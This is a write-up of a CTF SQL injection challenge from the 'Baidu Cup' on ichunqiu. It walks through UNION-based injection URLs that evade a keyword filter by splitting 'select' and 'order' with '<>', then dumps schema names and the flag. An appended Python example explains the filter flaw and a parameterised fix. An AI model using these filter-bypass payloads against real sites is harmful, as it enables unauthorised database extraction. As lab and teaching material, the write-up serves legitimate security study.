Challenge URL
https://www.ichunqiu.com/battalion?t=1
"Baidu Cup" CTF, September round. Challenge name: SQL Injection
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1
The page returns its normal output.
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1
No output is returned, which indicates that an injection point exists.
Determine the number of columns
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=1 ord<>er by 3
Splitting order with <> keeps it from being filtered out.
Determine which column is displayed
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,2,3
2 is echoed back, so column 2 is the displayed position.
Dump the database name
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,database(),3
Dump the tables
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,table_name,3 from information_schema.tables where table_schema=database()
Dump the columns
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,column_name,3 from information_schema.columns where table_name='info'
Dump the final data
http://e00e80716fe747c7b1d3c1b31b43468842689873f4a546ae.changame.ichunqiu.com/index.php?id=-1 union sel<>ect 1,flAg_T5ZNdrm,3 from info
Flag obtained.
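Why the <> split gets through, as an added example that is not part of the original write-up or the challenge's code: it assumes the server rejects the keywords order and select first and only afterwards strips <>, and sets that beside integer validation with a bound parameter. The news table, the function names and the SQLite backend are assumptions for illustration.

```python
import re
import sqlite3

# Assumption: the filter blocks these keywords, then strips "<>" afterwards.
BLACKLIST = re.compile(r"\b(select|order)\b", re.IGNORECASE)


def make_db():
    """Constructed sample data: a three-column table, as the write-up found."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'hello', 'world')")
    return db


def weak_filter(value):
    """Flawed order: the keyword check runs before the text is normalised."""
    if BLACKLIST.search(value):
        return None                      # "select" / "order" seen: reject
    return value.replace("<>", "")       # "sel<>ect" only now becomes "select"


def lookup_weak(db, raw_id):
    cleaned = weak_filter(raw_id)
    if cleaned is None:
        return []
    # Vulnerable: filtered input is still concatenated into the SQL text.
    sql = "SELECT id, title, body FROM news WHERE id = " + cleaned
    return db.execute(sql).fetchall()


def lookup_safe(db, raw_id):
    # Hardened: accept digits only and pass the value as a bound parameter,
    # so no keyword filter is needed at all.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "-1 union select 1,2,3", "-1 union sel<>ect 1,2,3"):
        print(repr(value), lookup_weak(db, value), lookup_safe(db, value))
```

The weak path blocks the plain keyword but returns the injected row for the split form, while the hardened path returns nothing for either.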
The figure below shows the structure of the information_schema database.